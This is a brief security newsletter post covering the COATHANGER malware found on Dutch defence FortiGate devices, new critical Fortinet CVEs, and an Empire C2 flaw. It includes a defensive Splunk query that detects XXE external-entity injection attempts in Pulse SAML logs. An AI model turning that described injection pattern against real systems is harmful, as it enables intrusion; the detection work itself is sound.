CCTR.7.FEB.24

Monday morning Cyber coffee read CCTR.7.FEB.24.

The Ministry of Defence (MOD) of the Netherlands was impacted in 2023 by a Chinese state-sponsored threat group. This serves as a reminder that this incident does not stand on its own but is part of a wider trend of Chinese political espionage against the Five Eyes and its allies. Incident response uncovered previously unpublished malware, COATHANGER, specifically designed for FortiGate appliances. Although this incident started with the abuse of CVE-2022-42475 (FortiGate vulnerability), the COATHANGER malware could conceivably be used in combination with any present or future software vulnerability in FortiGate devices. This malware can survive reboots and firmware upgrades.

Ref https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear

Hang in there! Fortinet has disclosed two more critical vulnerabilities, CVE-2024-21762 CVSS 9.6 and CVE-2024-23113 CVSS 9.8, both allowing remote code execution.

If you haven't patched yet, it might be a good idea to look for exploitation attempts in Pulse logs with a scheduled search:

`my_pulse_logs` message="*SAML AuthnRequest received *!DOCTYPE root [<!ENTITY %* \"http*" | rex field=message "\!DOCTYPE\sroot\s\[\<\!ENTITY\s\%.+?(?=\"http)\"(?<url>.+?(?=\"))"

Ref https://twitter.com/mthcht/status/1756500390667862083?s=46&t=HCEpLrULiOJC6LulFCCopw

A vulnerability in the Empire C2 framework prior to version 5.9.3 leads to remote code execution as root on the C2 Server. If you're using Empire in your penetration testing and red team activities, consider updating.